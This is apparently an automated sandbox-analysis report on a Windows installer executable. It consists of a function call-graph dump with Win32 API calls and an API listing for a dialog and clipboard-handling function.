3431->3435 3432->3431 3433 4054c9 3432->3433 3437 4054d4 SetWindowPos 3433->3437 3438 4054e7 3433->3438 3436 4056a4 3434->3436 3444 40139d 80 API calls 3434->3444 3439 403d6b 19 API calls 3435->3439 3445 4055f4 3436->3445 3500 403ddb 3436->3500 3437->3438 3441 405504 3438->3441 3442 4054ec ShowWindow 3438->3442 3443 405634 SetClassLongW 3439->3443 3446 405526 3441->3446 3447 40550c DestroyWindow 3441->3447 3442->3441 3448 40141d 80 API calls 3443->3448 3451 40567c 3444->3451 3449 40552b SetWindowLongW 3446->3449 3450 40553c 3446->3450 3452 405908 3447->3452 3448->3434 3449->3445 3453 4055e5 3450->3453 3454 405548 GetDlgItem 3450->3454 3451->3436 3455 405680 SendMessageW 3451->3455 3452->3445 3461 405939 ShowWindow 3452->3461 3520 403df6 3453->3520 3458 405578 3454->3458 3459 40555b SendMessageW IsWindowEnabled 3454->3459 3455->3445 3456 40141d 80 API calls 3469 4056b6 3456->3469 3457 40590a DestroyWindow KiUserCallbackDispatcher 3457->3452 3463 405585 3458->3463 3466 4055cc SendMessageW 3458->3466 3467 405598 3458->3467 3475 40557d 3458->3475 3459->3445 3459->3458 3461->3445 3462 406831 18 API calls 3462->3469 3463->3466 3463->3475 3465 403d6b 19 API calls 3465->3469 3466->3453 3470 4055a0 3467->3470 3471 4055b5 3467->3471 3468 4055b3 3468->3453 3469->3445 3469->3456 3469->3457 3469->3462 3469->3465 3491 40584a DestroyWindow 3469->3491 3503 403d6b 3469->3503 3514 40141d 3470->3514 3472 40141d 80 API calls 3471->3472 3474 4055bc 3472->3474 3474->3453 3474->3475 3517 403d44 3475->3517 3477 405731 GetDlgItem 3478 405746 3477->3478 3479 40574f ShowWindow KiUserCallbackDispatcher 3477->3479 3478->3479 3506 403db1 KiUserCallbackDispatcher 3479->3506 3481 405779 EnableWindow 3484 40578d 3481->3484 3482 405792 GetSystemMenu EnableMenuItem SendMessageW 3483 4057c2 SendMessageW 3482->3483 3482->3484 3483->3484 3484->3482 3507 403dc4 SendMessageW 3484->3507 3508 406035 lstrcpynW 3484->3508 3487 4057f0 lstrlenW 3488 406831 18 API calls 3487->3488 3489 405806 SetWindowTextW 3488->3489 3509 40139d 3489->3509 3491->3452 3492 405864 CreateDialogParamW 3491->3492 3492->3452 3493 405897 3492->3493 3494 403d6b 19 API calls 3493->3494 3495 4058a2 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3494->3495 3496 40139d 80 API calls 3495->3496 3497 4058e8 3496->3497 3497->3445 3498 4058f0 ShowWindow 3497->3498 3499 403ddb SendMessageW 3498->3499 3499->3452 3501 403df3 3500->3501 3502 403de4 SendMessageW 3500->3502 3501->3469 3502->3501 3504 406831 18 API calls 3503->3504 3505 403d76 SetDlgItemTextW 3504->3505 3505->3477 3506->3481 3507->3484 3508->3487 3512 4013a4 3509->3512 3510 401410 3510->3469 3512->3510 3513 4013dd MulDiv SendMessageW 3512->3513 3534 4015a0 3512->3534 3513->3512 3515 40139d 80 API calls 3514->3515 3516 401432 3515->3516 3516->3475 3518 403d51 SendMessageW 3517->3518 3519 403d4b 3517->3519 3518->3468 3519->3518 3521 403e0b GetWindowLongW 3520->3521 3531 403e94 3520->3531 3522 403e1c 3521->3522 3521->3531 3523 403e2b GetSysColor 3522->3523 3524 403e2e 3522->3524 3523->3524 3525 403e34 SetTextColor 3524->3525 3526 403e3e SetBkMode 3524->3526 3525->3526 3527 403e56 GetSysColor 3526->3527 3528 403e5c 3526->3528 3527->3528 3529 403e63 SetBkColor 3528->3529 3530 403e6d 3528->3530 3529->3530 3530->3531 3532 403e80 DeleteObject 3530->3532 3533 403e87 CreateBrushIndirect 3530->3533 3531->3445 3532->3533 3533->3531 3535 4015fa 3534->3535 3614 40160c 3534->3614 3536 401601 3535->3536 3537 401742 3535->3537 3538 401962 3535->3538 3539 4019ca 3535->3539 3540 40176e 3535->3540 3541 401650 3535->3541 3542 4017b1 3535->3542 3543 401672 3535->3543 3544 401693 3535->3544 3545 401616 3535->3545 3546 4016d6 3535->3546 3547 401736 3535->3547 3548 401897 3535->3548 3549 4018db 3535->3549 3550 40163c 3535->3550 3551 4016bd 3535->3551 3535->3614 3560 4062cf 11 API calls 3536->3560 3552 401751 ShowWindow 3537->3552 3553 401758 3537->3553 3557 40145c 18 API calls 3538->3557 3564 40145c 18 API calls 3539->3564 3554 40145c 18 API calls 3540->3554 3578 4062cf 11 API calls 3541->3578 3558 40145c 18 API calls 3542->3558 3555 40145c 18 API calls 3543->3555 3559 401446 18 API calls 3544->3559 3563 40145c 18 API calls 3545->3563 3577 401446 18 API calls 3546->3577 3546->3614 3547->3614 3668 405f7d wsprintfW 3547->3668 3556 40145c 18 API calls 3548->3556 3561 40145c 18 API calls 3549->3561 3565 401647 PostQuitMessage 3550->3565 3550->3614 3562 4062cf 11 API calls 3551->3562 3552->3553 3566 401765 ShowWindow 3553->3566 3553->3614 3567 401775 3554->3567 3568 401678 3555->3568 3569 40189d 3556->3569 3570 401968 GetFullPathNameW 3557->3570 3571 4017b8 3558->3571 3572 40169a 3559->3572 3560->3614 3573 4018e2 3561->3573 3574 4016c7 SetForegroundWindow 3562->3574 3575 40161c 3563->3575 3576 4019d1 SearchPathW 3564->3576 3565->3614 3566->3614 3580 4062cf 11 API calls 3567->3580 3581 4062cf 11 API calls 3568->3581 3659 406301 FindFirstFileW 3569->3659 3583 4019a1 3570->3583 3584 40197f 3570->3584 3585 4062cf 11 API calls 3571->3585 3586 4062cf 11 API calls 3572->3586 3587 40145c 18 API calls 3573->3587 3574->3614 3588 4062cf 11 API calls 3575->3588 3576->3547 3576->3614 3577->3614 3589 401664 3578->3589 3590 401785 SetFileAttributesW 3580->3590 3591 401683 3581->3591 3603 4019b8 GetShortPathNameW 3583->3603 3583->3614 3584->3583 3609 406301 2 API calls 3584->3609 3593 4017c9 3585->3593 3594 4016a7 Sleep 3586->3594 3595 4018eb 3587->3595 3596 401627 3588->3596 3597 40139d 65 API calls 3589->3597 3598 40179a 3590->3598 3590->3614 3607 404f9e 25 API calls 3591->3607 3641 405d85 CharNextW CharNextW 3593->3641 3594->3614 3604 40145c 18 API calls 3595->3604 3605 404f9e 25 API calls 3596->3605 3597->3614 3606 4062cf 11 API calls 3598->3606 3599 4018c2 3610 4062cf 11 API calls 3599->3610 3600 4018a9 3608 4062cf 11 API calls 3600->3608 3603->3614 3612 4018f5 3604->3612 3605->3614 3606->3614 3607->3614 3608->3614 3613 401991 3609->3613 3610->3614 3611 4017d4 3615 401864 3611->3615 3618 405d32 CharNextW 3611->3618 3636 4062cf 11 API calls 3611->3636 3616 4062cf 11 API calls 3612->3616 3613->3583 3667 406035 lstrcpynW 3613->3667 3614->3512 3615->3591 3617 40186e 3615->3617 3619 401902 MoveFileW 3616->3619 3647 404f9e 3617->3647 3622 4017e6 CreateDirectoryW 3618->3622 3623 401912 3619->3623 3624 40191e 3619->3624 3622->3611 3626 4017fe GetLastError 3622->3626 3623->3591 3630 406301 2 API calls 3624->3630 3640 401942 3624->3640 3628 401827 GetFileAttributesW 3626->3628 3629 40180b GetLastError 3626->3629 3628->3611 3633 4062cf 11 API calls 3629->3633 3634 401929 3630->3634 3631 401882 SetCurrentDirectoryW 3631->3614 3632 4062cf 11 API calls 3635 40195c 3632->3635 3633->3611 3634->3640 3662 406c94 3634->3662 3635->3614 3636->3611 3639 404f9e 25 API calls 3639->3640 3640->3632 3642 405da2 3641->3642 3645 405db4 3641->3645 3644 405daf CharNextW 3642->3644 3642->3645 3643 405dd8 3643->3611 3644->3643 3645->3643 3646 405d32 CharNextW 3645->3646 3646->3645 3648 404fb7 3647->3648 3649 401875 3647->3649 3650 404fd5 lstrlenW 3648->3650 3651 406831 18 API calls 3648->3651 3658 406035 lstrcpynW 3649->3658 3652 404fe3 lstrlenW 3650->3652 3653 404ffe 3650->3653 3651->3650 3652->3649 3654 404ff5 lstrcatW 3652->3654 3655 405011 3653->3655 3656 405004 SetWindowTextW 3653->3656 3654->3653 3655->3649 3657 405017 SendMessageW SendMessageW SendMessageW 3655->3657 3656->3655 3657->3649 3658->3631 3660 4018a5 3659->3660 3661 406317 FindClose 3659->3661 3660->3599 3660->3600 3661->3660 3669 406328 GetModuleHandleA 3662->3669 3666 401936 3666->3639 3667->3583 3668->3614 3670 406340 LoadLibraryA 3669->3670 3671 40634b GetProcAddress 3669->3671 3670->3671 3672 406359 3670->3672 3671->3672 3672->3666 3673 406ac5 lstrcpyW 3672->3673 3674 406b13 GetShortPathNameW 3673->3674 3675 406aea 3673->3675 3676 406b2c 3674->3676 3677 406c8e 3674->3677 3699 405e7c GetFileAttributesW CreateFileW 3675->3699 3676->3677 3680 406b34 WideCharToMultiByte 3676->3680 3677->3666 3679 406af3 CloseHandle GetShortPathNameW 3679->3677 3681 406b0b 3679->3681 3680->3677 3682 406b51 WideCharToMultiByte 3680->3682 3681->3674 3681->3677 3682->3677 3683 406b69 wsprintfA 3682->3683 3684 406831 18 API calls 3683->3684 3685 406b95 3684->3685 3700 405e7c GetFileAttributesW CreateFileW 3685->3700 3687 406ba2 3687->3677 3688 406baf GetFileSize GlobalAlloc 3687->3688 3689 406bd0 ReadFile 3688->3689 3690 406c84 CloseHandle 3688->3690 3689->3690 3691 406bea 3689->3691 3690->3677 3691->3690 3701 405de2 lstrlenA 3691->3701 3694 406c03 lstrcpyA 3697 406c25 3694->3697 3695 406c17 3696 405de2 4 API calls 3695->3696 3696->3697 3698 406c5c SetFilePointer WriteFile GlobalFree 3697->3698 3698->3690 3699->3679 3700->3687 3702 405e23 lstrlenA 3701->3702 3703 405e2b 3702->3703 3704 405dfc lstrcmpiA 3702->3704 3703->3694 3703->3695 3704->3703 3705 405e1a CharNextA 3704->3705 3705->3702 4865 402da5 4866 4030e3 4865->4866 4867 402dac 4865->4867 4868 401446 18 API calls 4867->4868 4869 402db8 4868->4869 4870 402dbf SetFilePointer 4869->4870 4870->4866 4871 402dcf 4870->4871 4871->4866 4873 405f7d wsprintfW 4871->4873 4873->4866 4874 4049a8 GetDlgItem GetDlgItem 4875 4049fe 7 API calls 4874->4875 4880 404c16 4874->4880 4876 404aa2 DeleteObject 4875->4876 4877 404a96 SendMessageW 4875->4877 4878 404aad 4876->4878 4877->4876 4881 404ae4 4878->4881 4884 406831 18 API calls 4878->4884 4879 404cfb 4882 404da0 4879->4882 4883 404c09 4879->4883 4888 404d4a SendMessageW 4879->4888 4880->4879 4892 40487a 5 API calls 4880->4892 4905 404c86 4880->4905 4887 403d6b 19 API calls 4881->4887 4885 404db5 4882->4885 4886 404da9 SendMessageW 4882->4886 4889 403df6 8 API calls 4883->4889 4890 404ac6 SendMessageW SendMessageW 4884->4890 4897 404dc7 ImageList_Destroy 4885->4897 4898 404dce 4885->4898 4903 404dde 4885->4903 4886->4885 4893 404af8 4887->4893 4888->4883 4895 404d5f SendMessageW 4888->4895 4896 404f97 4889->4896 4890->4878 4891 404ced SendMessageW 4891->4879 4892->4905 4899 403d6b 19 API calls 4893->4899 4894 404f48 4894->4883 4904 404f5d ShowWindow GetDlgItem ShowWindow 4894->4904 4900 404d72 4895->4900 4897->4898 4901 404dd7 GlobalFree 4898->4901 4898->4903 4907 404b09 4899->4907 4909 404d83 SendMessageW 4900->4909 4901->4903 4902 404bd6 GetWindowLongW SetWindowLongW 4906 404bf0 4902->4906 4903->4894 4908 40141d 80 API calls 4903->4908 4918 404e10 4903->4918 4904->4883 4905->4879 4905->4891 4910 404bf6 ShowWindow 4906->4910 4911 404c0e 4906->4911 4907->4902 4913 404b65 SendMessageW 4907->4913 4914 404bd0 4907->4914 4916 404b93 SendMessageW 4907->4916 4917 404ba7 SendMessageW 4907->4917 4908->4918 4909->4882 4925 403dc4 SendMessageW 4910->4925 4926 403dc4 SendMessageW 4911->4926 4913->4907 4914->4902 4914->4906 4916->4907 4917->4907 4919 404e54 4918->4919 4922 404e3e SendMessageW 4918->4922 4920 404f1f InvalidateRect 4919->4920 4924 404ecd SendMessageW SendMessageW 4919->4924 4920->4894 4921 404f35 4920->4921 4923 4043d9 21 API calls 4921->4923 4922->4919 4923->4894 4924->4919 4925->4883 4926->4880 4927 4030a9 SendMessageW 4928 4030c2 InvalidateRect 4927->4928 4929 4030e3 4927->4929 4928->4929 3880 4038af #17 SetErrorMode OleInitialize 3881 406328 3 API calls 3880->3881 3882 4038f2 SHGetFileInfoW 3881->3882 3954 406035 lstrcpynW 3882->3954 3884 40391d GetCommandLineW 3955 406035 lstrcpynW 3884->3955 3886 40392f GetModuleHandleW 3887 403947 3886->3887 3888 405d32 CharNextW 3887->3888 3889 403956 CharNextW 3888->3889 3900 403968 3889->3900 3890 403a02 3891 403a21 GetTempPathW 3890->3891 3956 4037f8 3891->3956 3893 403a37 3895 403a3b GetWindowsDirectoryW lstrcatW 3893->3895 3896 403a5f DeleteFileW 3893->3896 3894 405d32 CharNextW 3894->3900 3898 4037f8 11 API calls 3895->3898 3964 4035b3 GetTickCount GetModuleFileNameW 3896->3964 3901 403a57 3898->3901 3899 403a73 3902 403af8 3899->3902 3904 405d32 CharNextW 3899->3904 3940 403add 3899->3940 3900->3890 3900->3894 3907 403a04 3900->3907 3901->3896 3901->3902 4049 403885 3902->4049 3908 403a8a 3904->3908 4056 406035 lstrcpynW 3907->4056 3919 403b23 lstrcatW lstrcmpiW 3908->3919 3920 403ab5 3908->3920 3909 403aed 3912 406113 9 API calls 3909->3912 3910 403bfa 3913 403c7d 3910->3913 3915 406328 3 API calls 3910->3915 3911 403b0d 3914 405ccc MessageBoxIndirectW 3911->3914 3912->3902 3916 403b1b ExitProcess 3914->3916 3918 403c09 3915->3918 3922 406328 3 API calls 3918->3922 3919->3902 3921 403b3f CreateDirectoryW SetCurrentDirectoryW 3919->3921 4057 4067aa 3920->4057 3924 403b62 3921->3924 3925 403b57 3921->3925 3926 403c12 3922->3926 4074 406035 lstrcpynW 3924->4074 4073 406035 lstrcpynW 3925->4073 3930 406328 3 API calls 3926->3930 3933 403c1b 3930->3933 3932 403b70 4075 406035 lstrcpynW 3932->4075 3934 403c69 ExitWindowsEx 3933->3934 3939 403c29 GetCurrentProcess 3933->3939 3934->3913 3938 403c76 3934->3938 3935 403ad2 4072 406035 lstrcpynW 3935->4072 3941 40141d 80 API calls 3938->3941 3943 403c39 3939->3943 3992 405958 3940->3992 3941->3913 3942 406831 18 API calls 3944 403b98 DeleteFileW 3942->3944 3943->3934 3945 403ba5 CopyFileW 3944->3945 3951 403b7f 3944->3951 3945->3951 3946 403bee 3947 406c94 42 API calls 3946->3947 3949 403bf5 3947->3949 3948 406c94 42 API calls 3948->3951 3949->3902 3950 406831 18 API calls 3950->3951 3951->3942 3951->3946 3951->3948 3951->3950 3953 403bd9 CloseHandle 3951->3953 4076 405c6b CreateProcessW 3951->4076 3953->3951 3954->3884 3955->3886 3957 406064 5 API calls 3956->3957 3958 403804 3957->3958 3959 40380e 3958->3959 3960 40674e 3 API calls 3958->3960 3959->3893 3961 403816 CreateDirectoryW 3960->3961 3962 405eab 2 API calls 3961->3962 3963 40382a 3962->3963 3963->3893 4079 405e7c GetFileAttributesW CreateFileW 3964->4079 3966 4035f3 3986 403603 3966->3986 4080 406035 lstrcpynW 3966->4080 3968 403619 4081 40677d lstrlenW 3968->4081 3972 40362a GetFileSize 3973 403726 3972->3973 3987 403641 3972->3987 4086 4032d2 3973->4086 3975 40372f 3977 40376b GlobalAlloc 3975->3977 3975->3986 4098 403368 SetFilePointer 3975->4098 3976 403336 ReadFile 3976->3987 4097 403368 SetFilePointer 3977->4097 3980 4037e9 3983 4032d2 6 API calls 3980->3983 3981 403786 3984 40337f 33 API calls 3981->3984 3982 40374c 3985 403336 ReadFile 3982->3985 3983->3986 3990 403792 3984->3990 3989 403757 3985->3989 3986->3899 3987->3973 3987->3976 3987->3980 3987->3986 3988 4032d2 6 API calls 3987->3988 3988->3987 3989->3977 3989->3986 3990->3986 3990->3990 3991 4037c0 SetFilePointer 3990->3991 3991->3986 3993 406328 3 API calls 3992->3993 3994 40596c 3993->3994 3995 405972 3994->3995 3996 405984 3994->3996 4112 405f7d wsprintfW 3995->4112 3997 405eff 3 API calls 3996->3997 3998 4059b5 3997->3998 4000 4059d4 lstrcatW 3998->4000 4002 405eff 3 API calls 3998->4002 4001 405982 4000->4001 4103 403ec1 4001->4103 4002->4000 4005 4067aa 18 API calls 4006 405a06 4005->4006 4007 405a9c 4006->4007 4009 405eff 3 API calls 4006->4009 4008 4067aa 18 API calls 4007->4008 4010 405aa2 4008->4010 4011 405a38 4009->4011 4012 405ab2 4010->4012 4013 406831 18 API calls 4010->4013 4011->4007 4015 405a5b lstrlenW 4011->4015 4018 405d32 CharNextW 4011->4018 4014 405ad2 LoadImageW 4012->4014 4114 403ea0 4012->4114 4013->4012 4016 405b92 4014->4016 4017 405afd RegisterClassW 4014->4017 4019 405a69 lstrcmpiW 4015->4019 4020 405a8f 4015->4020 4024 40141d 80 API calls 4016->4024 4022 405b9c 4017->4022 4023 405b45 SystemParametersInfoW CreateWindowExW 4017->4023 4025 405a56 4018->4025 4019->4020 4026 405a79 GetFileAttributesW 4019->4026 4028 40674e 3 API calls 4020->4028 4022->3909 4023->4016 4029 405b98 4024->4029 4025->4015 4030 405a85 4026->4030 4027 405ac8 4027->4014 4031 405a95 4028->4031 4029->4022 4032 403ec1 19 API calls 4029->4032 4030->4020 4033 40677d 2 API calls 4030->4033 4113 406035 lstrcpynW 4031->4113 4035 405ba9 4032->4035 4033->4020 4036 405bb5 ShowWindow LoadLibraryW 4035->4036 4037 405c38 4035->4037 4038 405bd4 LoadLibraryW 4036->4038 4039 405bdb GetClassInfoW 4036->4039 4040 405073 83 API calls 4037->4040 4038->4039 4041 405c05 DialogBoxParamW 4039->4041 4042 405bef GetClassInfoW RegisterClassW 4039->4042 4043 405c3e 4040->4043 4046 40141d 80 API calls 4041->4046 4042->4041 4044 405c42 4043->4044 4045 405c5a 4043->4045 4044->4022 4048 40141d 80 API calls 4044->4048 4047 40141d 80 API calls 4045->4047 4046->4022 4047->4022 4048->4022 4050 40389d 4049->4050 4051 40388f CloseHandle 4049->4051 4121 403caf 4050->4121 4051->4050 4056->3891 4174 406035 lstrcpynW 4057->4174 4059 4067bb 4060 405d85 4 API calls 4059->4060 4061 4067c1 4060->4061 4062 406064 5 API calls 4061->4062 4069 403ac3 4061->4069 4065 4067d1 4062->4065 4063 406809 lstrlenW 4064 406810 4063->4064 4063->4065 4067 40674e 3 API calls 4064->4067 4065->4063 4066 406301 2 API calls 4065->4066 4065->4069 4070 40677d 2 API calls 4065->4070 4066->4065 4068 406816 GetFileAttributesW 4067->4068 4068->4069 4069->3902 4071 406035 lstrcpynW 4069->4071 4070->4063 4071->3935 4072->3940 4073->3924 4074->3932 4075->3951 4077 405ca6 4076->4077 4078 405c9a CloseHandle 4076->4078 4077->3951 4078->4077 4079->3966 4080->3968 4082 40678c 4081->4082 4083 406792 CharPrevW 4082->4083 4084 40361f 4082->4084 4083->4082 4083->4084 4085 406035 lstrcpynW 4084->4085 4085->3972 4087 4032f3 4086->4087 4088 4032db 4086->4088 4091 403303 GetTickCount 4087->4091 4092 4032fb 4087->4092 4089 4032e4 DestroyWindow 4088->4089 4090 4032eb 4088->4090 4089->4090 4090->3975 4094 403311 CreateDialogParamW ShowWindow 4091->4094 4095 403334 4091->4095 4099 40635e 4092->4099 4094->4095 4095->3975 4097->3981 4098->3982 4100 40637b PeekMessageW 4099->4100 4101 406371 DispatchMessageW 4100->4101 4102 403301 4100->4102 4101->4100 4102->3975 4104 403ed5 4103->4104 4119 405f7d wsprintfW 4104->4119 4106 403f49 4107 406831 18 API calls 4106->4107 4108 403f55 SetWindowTextW 4107->4108 4109 403f70 4108->4109 4110 403f8b 4109->4110 4111 406831 18 API calls 4109->4111 4110->4005 4111->4109 4112->4001 4113->4007 4120 406035 lstrcpynW 4114->4120 4116 403eb4 4117 40674e 3 API calls 4116->4117 4118 403eba lstrcatW 4117->4118 4118->4027 4119->4106 4120->4116 4122 403cbd 4121->4122 4123 4038a2 4122->4123 4124 403cc2 FreeLibrary GlobalFree 4122->4124 4125 406cc7 4123->4125 4124->4123 4124->4124 4126 4067aa 18 API calls 4125->4126 4127 406cda 4126->4127 4128 406ce3 DeleteFileW 4127->4128 4129 406cfa 4127->4129 4168 4038ae CoUninitialize 4128->4168 4130 406e77 4129->4130 4172 406035 lstrcpynW 4129->4172 4136 406301 2 API calls 4130->4136 4156 406e84 4130->4156 4130->4168 4132 406d25 4133 406d39 4132->4133 4134 406d2f lstrcatW 4132->4134 4137 40677d 2 API calls 4133->4137 4135 406d3f 4134->4135 4139 406d4f lstrcatW 4135->4139 4141 406d57 lstrlenW FindFirstFileW 4135->4141 4138 406e90 4136->4138 4137->4135 4142 40674e 3 API calls 4138->4142 4138->4168 4139->4141 4140 4062cf 11 API calls 4140->4168 4145 406e67 4141->4145 4169 406d7e 4141->4169 4143 406e9a 4142->4143 4146 4062cf 11 API calls 4143->4146 4144 405d32 CharNextW 4144->4169 4145->4130 4147 406ea5 4146->4147 4148 405e5c 2 API calls 4147->4148 4149 406ead RemoveDirectoryW 4148->4149 4153 406ef0 4149->4153 4154 406eb9 4149->4154 4150 406e44 FindNextFileW 4152 406e5c FindClose 4150->4152 4150->4169 4152->4145 4155 404f9e 25 API calls 4153->4155 4154->4156 4157 406ebf 4154->4157 4155->4168 4156->4140 4159 4062cf 11 API calls 4157->4159 4158 4062cf 11 API calls 4158->4169 4160 406ec9 4159->4160 4163 404f9e 25 API calls 4160->4163 4161 406cc7 72 API calls 4161->4169 4162 405e5c 2 API calls 4164 406dfa DeleteFileW 4162->4164 4165 406ed3 4163->4165 4164->4169 4166 406c94 42 API calls 4165->4166 4166->4168 4167 404f9e 25 API calls 4167->4150 4168->3910 4168->3911 4169->4144 4169->4150 4169->4158 4169->4161 4169->4162 4169->4167 4170 404f9e 25 API calls 4169->4170 4171 406c94 42 API calls 4169->4171 4173 406035 lstrcpynW 4169->4173 4170->4169 4171->4169 4172->4132 4173->4169 4174->4059 4930 401cb2 4931 40145c 18 API calls 4930->4931 4932 401c54 4931->4932 4933 4062cf 11 API calls 4932->4933 4934 401c64 4932->4934 4935 401c59 4933->4935 4936 406cc7 81 API calls 4935->4936 4936->4934 3706 4021b5 3707 40145c 18 API calls 3706->3707 3708 4021bb 3707->3708 3709 40145c 18 API calls 3708->3709 3710 4021c4 3709->3710 3711 40145c 18 API calls 3710->3711 3712 4021cd 3711->3712 3713 40145c 18 API calls 3712->3713 3714 4021d6 3713->3714 3715 404f9e 25 API calls 3714->3715 3716 4021e2 ShellExecuteW 3715->3716 3717 40221b 3716->3717 3718 40220d 3716->3718 3719 4062cf 11 API calls 3717->3719 3720 4062cf 11 API calls 3718->3720 3721 402230 3719->3721 3720->3717 4937 402238 4938 40145c 18 API calls 4937->4938 4939 40223e 4938->4939 4940 4062cf 11 API calls 4939->4940 4941 40224b 4940->4941 4942 404f9e 25 API calls 4941->4942 4943 402255 4942->4943 4944 405c6b 2 API calls 4943->4944 4945 40225b 4944->4945 4946 4062cf 11 API calls 4945->4946 4954 4022ac CloseHandle 4945->4954 4951 40226d 4946->4951 4948 4030e3 4949 402283 WaitForSingleObject 4950 402291 GetExitCodeProcess 4949->4950 4949->4951 4953 4022a3 4950->4953 4950->4954 4951->4949 4952 40635e 2 API calls 4951->4952 4951->4954 4952->4949 4956 405f7d wsprintfW 4953->4956 4954->4948 4956->4954 4957 404039 4958 404096 4957->4958 4959 404046 lstrcpynA lstrlenA 4957->4959 4959->4958 4960 404077 4959->4960 4960->4958 4961 404083 GlobalFree 4960->4961 4961->4958 4962 401eb9 4963 401f24 4962->4963 4966 401ec6 4962->4966 4964 401f53 GlobalAlloc 4963->4964 4968 401f28 4963->4968 4970 406831 18 API calls 4964->4970 4965 401ed5 4969 4062cf 11 API calls 4965->4969 4966->4965 4972 401ef7 4966->4972 4967 401f36 4986 406035 lstrcpynW 4967->4986 4968->4967 4971 4062cf 11 API calls 4968->4971 4981 401ee2 4969->4981 4974 401f46 4970->4974 4971->4967 4984 406035 lstrcpynW 4972->4984 4976 402708 4974->4976 4977 402387 GlobalFree 4974->4977 4977->4976 4978 401f06 4985 406035 lstrcpynW 4978->4985 4979 406831 18 API calls 4979->4981 4981->4976 4981->4979 4982 401f15 4987 406035 lstrcpynW 4982->4987 4984->4978 4985->4982 4986->4974 4987->4976

                                      Executed Functions

                                      Function 004050F9 Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 295windowclipboardmemoryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 0 4050f9-405114 1 4052c1-4052c8 0->1 2 40511a-405201 GetDlgItem * 3 call 403dc4 call 4044a2 call 406831 call 4062cf GetClientRect GetSystemMetrics SendMessageW * 2 0->2 3 4052f2-4052ff 1->3 4 4052ca-4052ec GetDlgItem CreateThread CloseHandle 1->4 35 405203-40521d SendMessageW * 2 2->35 36 40521f-405222 2->36 6 405320-405327 3->6 7 405301-40530a 3->7 4->3 11 405329-40532f 6->11 12 40537e-405382 6->12 9 405342-40534b call 403df6 7->9 10 40530c-40531b ShowWindow * 2 call 403dc4 7->10 22 405350-405354 9->22 10->6 16 405331-40533d call 403d44 11->16 17 405357-405367 ShowWindow 11->17 12->9 14 405384-405387 12->14 14->9 20 405389-40539c SendMessageW 14->20 16->9 23 405377-405379 call 403d44 17->23 24 405369-405372 call 404f9e 17->24 29 4053a2-4053c3 CreatePopupMenu call 406831 AppendMenuW 20->29 30 4052ba-4052bc 20->30 23->12 24->23 37 4053c5-4053d6 GetWindowRect 29->37 38 4053d8-4053de 29->38 30->22 35->36 39 405232-405249 call 403d6b 36->39 40 405224-405230 SendMessageW 36->40 41 4053df-4053f7 TrackPopupMenu 37->41 38->41 46 40524b-40525f ShowWindow 39->46 47 40527f-4052a0 GetDlgItem SendMessageW 39->47 40->39 41->30 43 4053fd-405414 41->43 45 405419-405434 SendMessageW 43->45 45->45 48 405436-405459 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 45->48 49 405261-40526c ShowWindow 46->49 50 40526e 46->50 47->30 51 4052a2-4052b8 SendMessageW * 2 47->51 52 40545b-405484 SendMessageW 48->52 54 405274-40527a call 403dc4 49->54 50->54 51->30 52->52 53 405486-4054a0 GlobalUnlock SetClipboardData CloseClipboard 52->53 53->30 54->47
                                      APIs
                                      • GetDlgItem.USER32(?,00000403), ref: 0040515B
                                      • GetDlgItem.USER32(?,000003EE), ref: 0040516A
                                      • GetClientRect.USER32(?,?), ref: 004051C2
                                      • GetSystemMetrics.USER32(00000015), ref: 004051CA
                                      • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051EB
                                      • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051FC
                                      • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040520F
                                      • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040521D
                                      • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405230
                                      • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405252
                                      • ShowWindow.USER32(?,00000008), ref: 00405266
                                      • GetDlgItem.USER32(?,000003EC), ref: 00405287
                                      • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405297
                                      • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004052AC
                                      • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004052B8
                                      • GetDlgItem.USER32(?,000003F8), ref: 00405179
                                        • Part of subcall function 00403DC4: SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
                                        • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00426EE3,74DF23A0,00000000), ref: 00406902
                                        • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                        • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                      • GetDlgItem.USER32(?,000003EC), ref: 004052D7
                                      • CreateThread.KERNELBASE(00000000,00000000,Function_00005073,00000000), ref: 004052E5
                                      • CloseHandle.KERNELBASE(00000000), ref: 004052EC
                                      • ShowWindow.USER32(00000000), ref: 00405313
                                      • ShowWindow.USER32(?,00000008), ref: 00405318
                                      • ShowWindow.USER32(00000008), ref: 0040535F
                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405391
                                      • CreatePopupMenu.USER32 ref: 004053A2
                                      • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004053B7
                                      • GetWindowRect.USER32(?,?), ref: 004053CA
                                      • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053EC
                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405427
                                      • OpenClipboard.USER32(00000000), ref: 00405437
                                      • EmptyClipboard.USER32 ref: 0040543D
                                      • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 00405449
                                      • GlobalLock.KERNEL32(00000000), ref: 00405453
                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405467
                                      • GlobalUnlock.KERNEL32(00000000), ref: 00405489
                                      • SetClipboardData.USER32(0000000D,00000000), ref: 00405494
                                      • CloseClipboard.USER32 ref: 0040549A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1710196423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710160761.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
